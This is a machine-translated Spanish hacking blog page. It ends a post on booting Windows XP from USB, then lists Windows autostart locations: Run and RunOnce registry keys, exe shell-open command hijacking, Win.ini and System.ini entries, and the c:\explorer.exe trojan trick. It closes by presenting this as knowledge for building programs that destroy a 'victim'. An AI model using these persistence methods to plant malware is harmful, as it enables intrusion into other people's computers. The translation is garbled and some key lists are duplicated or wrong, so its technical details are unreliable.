Después de que el proceso de formato hecho, reinicie el sistema y asegúrese de activar la secuencia de arranque USB desde la BIOS ~ mientras que el disco USB aún enchufado Deja que el ordenador arranca desde el mismo y se muestra un proceso de arranque en el monitor. Los procesos de arranque está tomando mucho tiempo dependerá de la velocidad de almacenamiento USB, por lo que sería genial si también está preparando un café y un cigarrillo durante la espera en el escritorio a aparecer.



xpusb3.jpg
Tenga en cuenta que este USB en vivo también está equipado con la funcionalidad completa del símbolo del sistema. Desde la imagen de abajo, es DOS son en realidad provienen de un verdadero Windows XP.


xpusb4.jpg
Para ver la información detallada del sistema, realizar una visita a los menus. Se muestra una información básica sencilla le gusta el ambiente del sistema y otros programas integrados.


xpusb5.jpg

Mira la foto de abajo otra vez, un vínculo Acerca de los programas de pintura que muestra exactamente el mismo que el sobre que podría encontrarse en un entorno Windows real. Sin embargo, se trata de una Alemania completamente. No tiene que confundirse con él.

xpusb6.jpg



A pesar de que tiene grandes ventajas, por ejemplo: para rescatar al sistema, es la legalidad de usar que se pide. Este enlace una de las páginas de abordar varios están mostrando sobre la legalidad de la ley de propiedad. Para mí, podría estar bien siempre y cuando la necesita aún se encuentran en un estado de derecho. Tienen una movilidad buena con él.




Fuente:


http://www.trickspedia.com/tips/how-to-run-windows-xp-from-a-usb-stick/


Traduccion: Dellcom1@


Saludos Mundo Libre.

viernes, 2 de septiembre de 2011

Posibles archivos infectados

Saludos Mundo Libre.

Aqui tocaremos un tema no muy comun para los que empiesan con el tema del hacking que son los archivos de windows  en especial en los registros de windows .



1.  Esto se aplica a todas las versiones de Windows, Windows9x tiene una carpeta de inicio global y WinXP/2K tiene un usuario y por todos los usuarios de la carpeta de inicio.

c: \ Documents and Settings \ All Users \ Start Menu \ Programs \ Startup

Y

c: \ Documents and Settings \ username \ Start Menu \ Programs \ Startup

Windows abre todos los elementos de la carpeta de inicio en el arranque / inicio de sesión, esta carpeta es fácil de encontrar y puede sólo 'haga clic derecho y borrar' para eliminar los elementos de la misma.

Tenga en cuenta lo anterior, dice "abierto" no "correr" esto significa que si hay un archivo. Txt, bloc de notas se abrirá si hay un archivo. Wav el programa predeterminado para el manejo de los archivos. Wav se abrirá y así sucesivamente. Atajos generalmente se ponen en la carpeta de inicio, pero los programas de todo / documentos / archivos se puede poner allí.

ORDEN DE INICIO PARA WINDOWS NT4/2000/XP/VISTA

El usuario introduce una contraseña y un inicio de sesión en el sistema

2. REGISTRO. Windows ejecuta todas las instrucciones en la opción "Ejecutar" del Registro de Windows. Los elementos de la opción "Ejecutar" sección (y en otras partes de la Secretaría se enumeran a continuación) pueden ser programas o archivos que los programas abiertos (los documentos), como se explica en el número 1 anterior.

Todas las claves Run:

[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]

[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]

[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnceEx]

[HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ RunEx]

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run]

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunOnceEx]

[HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ RunEx]

3. REGISTRO. Windows ejecuta todas las instrucciones en el "Run" del registro.

Gestión del equipo -> Servicios - artículos en "Automático"

4. REGISTRO. Windows ejecuta todas las instrucciones en el "RunOnce" del registro.

5. REGISTRO. Windows ejecuta las instrucciones en el "RunServicesOnce" de la Secretaría. (Windows utiliza los dos "RunOnce" secciones para ejecutar programas de una sola vez sólo, por lo general en el arranque siguiente, después de una instalación del programa.)

7. REGISTRO. Windows ejecuta las instrucciones en el HKEY_CLASSES_ROOT \ exefile \ shell \ open \ command "% 1"% * sección del Registro. Cualquier comando incrustado aquí se abrirá cuando cualquier archivo exe se ejecuta.

Los posibles otras:

[HKEY_CLASSES_ROOT \ exefile \ shell \ open \ command] = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ comfile \ shell \ open \ command] = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ batfile \ shell \ open \ command] = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ htafile \ Shell \ Open \ Command] = "\"% 1 \ "% *"
[HKEY_CLASSES_ROOT \ piffile \ shell \ open \ command] = "\"% 1 \ "% *"
[HKEY_LOCAL_MACHINE \ Software \ CLASSES \ batfile \ shell \ open \ command] = "\"% 1 \ "
% * "
[HKEY_LOCAL_MACHINE \ Software \ CLASSES \ comfile \ shell \ open \ command] = "\"% 1 \ "
% * "
[HKEY_LOCAL_MACHINE \ Software \ CLASSES \ exefile \ shell \ open \ command] = "\"% 1 \ "
% * "
[HKEY_LOCAL_MACHINE \ Software \ CLASSES \ htafile \ Shell \ Open \ Command] = "\"% 1 \ "
% * "
[HKEY_LOCAL_MACHINE \ Software \ CLASSES \ piffile \ shell \ open \ command] = "\"% 1 \ "
% * "

Si las llaves no tienen el carácter "\"% 1 \ "% *" valor como se muestra y se cambian a algo como "\" somefilename.exe% 1 \ "% *" que son automáticamente invocar el archivo especificado.

8. Archivos por lotes. Windows ejecuta todas las instrucciones en el archivo por lotes Winstart, que se encuentra en la carpeta de Windows. (Este archivo es desconocido para casi todos los usuarios de Windows y la mayoría de los expertos en Windows, y no podría existir en el sistema. Usted puede fácilmente crear, sin embargo. Tenga en cuenta que algunas versiones de Windows llame a la carpeta de Windows el "WinNT" carpeta.) El pleno del nombre del archivo es Winstart.bat.

9. Archivo de inicialización. Windows ejecuta las instrucciones en el "run =" línea en el archivo Win.ini, que se encuentra en la carpeta Windows (o WinNT) carpeta.

10. Archivo de inicialización. Windows ejecuta las instrucciones en el "load =" línea en el archivo Win.ini, que se encuentra en la carpeta Windows (o WinNT) carpeta.

También maneja las cosas en el shell = en System.ini o c: \ windows \ system.ini:

[Inicio]
shell = Explorer.exe C: \ windows \ nombre de archivo

El siguiente nombre de archivo explorer.exe se iniciará cada vez que Windows se inicia.

Al igual que con Win.ini, los nombres de archivo puede ser precedido por un espacio considerable en esa línea, para reducir la posibilidad de que puedan ser vistos. Normalmente, la ruta completa del archivo se incluye en esta entrada. Si no es así, compruebe el directorio \ Windows


11. RELANZAMIENTO. Reposiciones de los programas de Windows que se ejecuta cuando Windows se apaga. Windows no puede hacer esto con la mayoría no los programas de Microsoft, pero lo hará fácilmente con Internet Explorer y el Explorador de Windows, el administrador de archivos y carpetas, integrado en Windows. Si usted tiene Internet Explorer abiertas al cerrar ventanas abiertas, Windows volverá a abrir el IE con la misma página abierta al arrancar de nuevo. (Si esto no sucede en tu PC con Windows, alguien ha hecho esa opción. Use Tweak UI, la libre circulación de usuario de Microsoft Windows Interfaz de gestión, para reactivar "Recordar la configuración de Explorer", o lo que se llama en su versión de Windows.)

12. Programador de tareas. Windows ejecuta las instrucciones de ejecución automática en el Programador de tareas de Windows (o cualquier otro programador que complemente o sustituya el Programador de tareas). El Programador de tareas es una parte oficial de todas las versiones de Windows excepto la primera versión de Windows 95, pero se incluye en Windows 95 si el Microsoft Plus Pack se ha instalado.

13. INSTRUCCIONES DE SECUNDARIA. Los programas que Windows inicia en el arranque es libre de poner en marcha programas por separado por su cuenta. Técnicamente, estos no son programas que Windows inicia, pero son a menudo indistinguibles de los de la administración corriente programas de auto-si se ponen en marcha inmediatamente después de su "padre" de los programas se ejecutan.

14. C: \ EXPLORER.EXE MÉTODO.

C: \ Explorer.exe

Windows carga explorer.exe (normalmente se encuentra en el directorio de Windows) durante el proceso de arranque. Sin embargo, si c: \ explorer.exe existe, se ejecutará en lugar del explorer.exe de Windows. Si c: \ explorer.exe está dañado, el usuario será efectivamente excluidos de su sistema después de reiniciar el sistema.

Si c: \ explorer.exe es un troyano, será ejecutado. A diferencia de todos los métodos de autostart otros, no hay necesidad de cambios de archivo o registro - el archivo simplemente tiene que ser llamada c: \ explorer.exe

15. Métodos adicionales.

Otros métodos de arranque automático. Los dos primeros son utilizados por troyano SubSeven 2.2.

HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Active Setup \ Installed Components
HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Usershell carpetas

Icq Inet
[HKEY_CURRENT_USER \ Software \ Mirabilis \ ICQ \ Agent \ Apps \ test]
"Path" = "test.exe"
"Startup" = "c: \ \ test"
"Parameters" = ""
"Enable" = "Sí"

[HKEY_CURRENT_USER \ Software \ Mirabilis \ ICQ \ Agent \ Apps \]
Esta clave especifica que todas las aplicaciones se ejecutarán si ICQNET detecta una conexión a Internet.

[HKEY_LOCAL_MACHINE \ Software \ CLASSES \ ShellScrap] = "objeto de desecho"
"NeverShowExt" = ""
Esta tecla cambia extensión específica de su archivo.

[HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Session Manager \ BootExecute]

Esto es lo primero que se ejecuta.

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ UserInit]

[HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ Shell]

Asi que hay que conocer bien los registros de windows para asi poder crear aplicaciones que destrullan a nuestra victima sin reparo.

Saludos Mundo Libre.